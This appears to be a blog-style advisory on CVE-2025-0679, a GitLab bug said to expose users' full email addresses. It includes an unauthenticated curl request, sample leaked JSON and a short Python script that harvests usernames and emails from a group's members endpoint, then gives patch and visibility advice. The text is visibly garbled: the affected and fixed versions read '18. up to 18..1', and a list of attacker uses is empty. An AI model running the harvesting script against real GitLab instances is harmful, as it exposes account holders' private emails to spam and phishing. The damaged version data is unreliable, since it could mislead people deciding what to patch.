CVE-2025-0679 - GitLab Email Exposure Attack Explained with PoC

A new vulnerability — CVE-2025-0679 — was found in GitLab Community and Enterprise editions. All versions from 17.1 up to (but not including) 17.10.7, 17.11 up to 17.11.3, and 18. up to 18..1 are affected. This bug lets unauthorized users see full email addresses of account holders, even if those emails should have been partially hidden for privacy.

Let’s dive into how this happens, provide a simple proof-of-concept (PoC), and see how you can check your GitLab install, or defend against this.

Why This Matters

Email addresses are sensitive data. GitLab tries to partially hide them (like showing j@mail.com) in public places, but this flaw allows attackers to see them in full. Attackers could use this for:

How the Vulnerability Works

GitLab’s interface intends to obscure email addresses in certain user-related views or APIs. However, due to a logic error, under certain conditions in the UI or via specific API calls, these emails are shown in full to unauthorized users.

Suppose you’re browsing the members of a public project. Even if you aren’t a member, you should only see masked emails. With this bug, full emails are leaked.

Example API request

# Just access the members endpoint without authentication:
curl https://gitlab.example.com/api/v4/groups/<group-id>/members/all

Expected output (secure)

[
  {
    "id": 101,
    "username": "johndoe",
    "email": "j@email.com"
  }
]

Vulnerable output

[
  {
    "id": 101,
    "username": "johndoe",
    "email": "john.doe@example.com"
  }
]

Note: The sensitive email is revealed to anyone, regardless of login status.

Here’s a simple Python script to collect emails from a public GitLab group

import requests

group_id = '1234'  # Replace with real group ID
url = f"https://gitlab.example.com/api/v4/groups/{group_id}/members/all";

r = requests.get(url)
for member in r.json():
    print(f"{member['username']}: {member['email']}")

You can run this without authentication on an affected GitLab version and get a full list of user emails.

References & Original Sources

- GitLab CVE-2025-0679 Security Release Notes
- CVE Details – CVE-2025-0679 entry
- Official GitLab Security Blog
- GitLab API Docs

Update now: Upgrade to 17.10.7, 17.11.3, 18..1 or later.

- Limit member visibility: In GitLab’s settings, restrict who can view members and email addresses as much as possible.

Conclusion

CVE-2025-0679 is an information disclosure bug — easy to exploit, big privacy consequences. Make sure your GitLab is patched, and encourage others to do so if you see an exposed instance. Remember, bug hunters and attackers often scan for these low-hanging fruits!

For more details and updates, keep an eye on the GitLab Security Releases and security advisories.


*Stay safe, patch often, and always verify what your APIs reveal to strangers!*

Timeline

Published on: 05/22/2025 15:16:04 UTC
Last modified on: 05/29/2025 15:57:54 UTC